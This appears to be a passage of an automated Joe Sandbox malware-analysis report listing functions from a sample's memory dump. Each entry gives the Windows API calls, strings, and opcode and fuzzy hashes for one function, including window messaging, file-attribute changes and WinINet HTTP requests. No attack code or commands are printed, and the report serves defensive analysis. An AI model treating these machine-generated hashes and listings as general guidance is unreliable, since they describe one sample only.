                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: 73e0cdb77a01e50d532072e7812707f04fc8c100369974ee2dfc8baee68168dc
                                                                                                                                                                                                                                                                              • Instruction ID: 2aa0489bca0efa9bda8b4682e6006e2b7ac0bb6fdeee35ca3183294820799eb4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73e0cdb77a01e50d532072e7812707f04fc8c100369974ee2dfc8baee68168dc
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A21C2B5A40118FBCF10ABA0CC89EFEBBB5EF06350F10411AB951A32D1DB7D5819DB64
                                                                                                                                                                                                                                                                              Function 0075290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00752990
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 0075299B
                                                                                                                                                                                                                                                                              • GetParent.USER32 ref: 007529B7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007529BA
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 007529C3
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 007529D7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 007529DA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: a7935bd470cdb3675c6b83ec6f451f98a19c02dce9d3c4134de85a519c14ece3
                                                                                                                                                                                                                                                                              • Instruction ID: 00656d2f1f901f2c29ed95c58798f42758ebd5aefebd4a54a6e8dcdb8eb9d302
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7935bd470cdb3675c6b83ec6f451f98a19c02dce9d3c4134de85a519c14ece3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21F3B5E40118BBCF10ABA0CC85EFEBBB9EF05350F10401ABA51A3296DB7D5809DB64
                                                                                                                                                                                                                                                                              Function 007844BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00784539
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0078453C
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00784563
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00784586
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007845FE
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00784648
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00784663
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0078467E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00784692
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 007846AF
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2f651ef0bcfab9e8848dc8920c9bfb325517d6f704e3380cd611cd4f498c475c
                                                                                                                                                                                                                                                                              • Instruction ID: 84bf139b8fb6a2f1622a052f70eef7400bd94628598b5eaac55e548726d793b0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f651ef0bcfab9e8848dc8920c9bfb325517d6f704e3380cd611cd4f498c475c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8619E75A40209AFDB10DFA4CC85EEE77B8EF09710F104159FA14E72A2D7B8AD46DB50
                                                                                                                                                                                                                                                                              Function 006F2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006F2AF9
                                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 006F2B98
                                                                                                                                                                                                                                                                              • UnregisterHotKey.USER32(?), ref: 006F2D7D
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00733A1B
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00733A80
                                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00733AAD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                              • String ID: close all
                                                                                                                                                                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                              • Opcode ID: 2dade441d16860696ecb505d3070974cae28ea4af33e45158c03436e05ac718e
                                                                                                                                                                                                                                                                              • Instruction ID: 14b771700199870b4775710522ff282def3017e99b668b4eb37089a01cf1cf20
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2dade441d16860696ecb505d3070974cae28ea4af33e45158c03436e05ac718e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0D16D71701217DFDB29EF14C899A69F7A1FF04710F1142ADE94AAB2A2CB34AD52CF44
                                                                                                                                                                                                                                                                              Function 00768835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007689F2
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768A06
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00768A30
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00768A4A
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768A5C
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00768AA5
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00768AF5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                                                                              • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                              • Opcode ID: d1f75b7a330083c4e3248ed13ca05aef91a6209d5cb13de55d1d301e74c3e16a
                                                                                                                                                                                                                                                                              • Instruction ID: facbfade99f97e1a0b5a455f6d002207fb3a140b5827eb93768e76bdd6a44e68
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1f75b7a330083c4e3248ed13ca05aef91a6209d5cb13de55d1d301e74c3e16a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5819C729143059BCBA4EF54C454ABAB3E8BB84310F548A1EFD86D7250DB38E945CB93
                                                                                                                                                                                                                                                                              Function 007888F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00788992
                                                                                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0078899E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00788A79
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00788AAC
                                                                                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00788AE4
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00788B06
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00788B1E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 4072528602-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 96fdae008233be0c3ee64884a09700ba49b8f5306694ec8ca2f33f243d023f6e
                                                                                                                                                                                                                                                                              • Instruction ID: 0b3d98f8c50f1cb5e8564e459e9cda9ae09c4f244edc425db00ec5bc7349d4d5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96fdae008233be0c3ee64884a09700ba49b8f5306694ec8ca2f33f243d023f6e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C171D174680204EFEB64EF94C884FBA7BB5FF49300F548459E845A72A1CB39AD40CB53
                                                                                                                                                                                                                                                                              Function 006F7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 006F74D7
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7567: GetClientRect.USER32(?,?), ref: 006F758D
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7567: GetWindowRect.USER32(?,?), ref: 006F75CE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7567: ScreenToClient.USER32(?,?), ref: 006F75F6
                                                                                                                                                                                                                                                                              • GetDC.USER32 ref: 00736083
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00736096
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007360A4
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007360B9
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 007360C1
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00736152
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                              • Opcode ID: 194d53cc45aa3510ee266643ef98f09f1557b9765a3e63e5976e5fff05d76f6b
                                                                                                                                                                                                                                                                              • Instruction ID: b048c3f103ccdd805d11dc586971e79bc837ab1d56f9175edfe909648880a18b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 194d53cc45aa3510ee266643ef98f09f1557b9765a3e63e5976e5fff05d76f6b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1371CE31500209EFEF259F64C885EBA7BB2FF48320F248269ED555A2A7D7398C41DB60
                                                                                                                                                                                                                                                                              Function 0076CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CCB7
                                                                                                                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CCDF
                                                                                                                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CD0F
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0076CD67
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 0076CD7B
                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0076CD86
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                              • Opcode ID: 1b309fdcd3f772197bf5bb4513630347da5cc21a223831ab9d7f8b1cec93d98b
                                                                                                                                                                                                                                                                              • Instruction ID: 1756e8e7653471700bc88dc28fc06682e751c829052bd9ac21005d2a38c78244
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b309fdcd3f772197bf5bb4513630347da5cc21a223831ab9d7f8b1cec93d98b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41317F71600604AFD732AF658C88ABB7BFCEB45740B10852AF88697240DB38ED089B64
                                                                                                                                                                                                                                                                              Function 0075A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007355AE,?,?,Bad directive syntax error,0078DCD0,00000000,00000010,?,?), ref: 0075A236
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,007355AE,?), ref: 0075A23D
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0075A301
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                              • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                              • Opcode ID: 3187f3dfdc24ae45980d398cece156d3d7018d17e93dca88a8323dc7a3c50070
                                                                                                                                                                                                                                                                              • Instruction ID: 2b1a3f5b6c41f301bff0e0c220737f6775d082273d3b15a603a6a16f892b6c53
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3187f3dfdc24ae45980d398cece156d3d7018d17e93dca88a8323dc7a3c50070
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2421857284021DEFCF15AF90CC0AEFE7B75BF18300F004469F615650A2EB799A18DB51
                                                                                                                                                                                                                                                                              Function 007529EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetParent.USER32 ref: 007529F8
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00752A0D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00752A9A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                              • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                              • Opcode ID: 547e78ae2941d75bc9828a6a30d4ff0ea33cc9f9451919a3fe58a0e6516b1aff
                                                                                                                                                                                                                                                                              • Instruction ID: a9ebc6b6b2e03f43d69a167d1f422f57c1958519677da4d312b6e6e44439410a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 547e78ae2941d75bc9828a6a30d4ff0ea33cc9f9451919a3fe58a0e6516b1aff
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9511E3B6784306F9FA246624EC0BDE737AD8F16B25B308012FE04E40D2FBADA8464654
                                                                                                                                                                                                                                                                              Function 006F7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 006F758D
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 006F75CE
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 006F75F6
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 006F773A
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 006F775B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1296646539-0
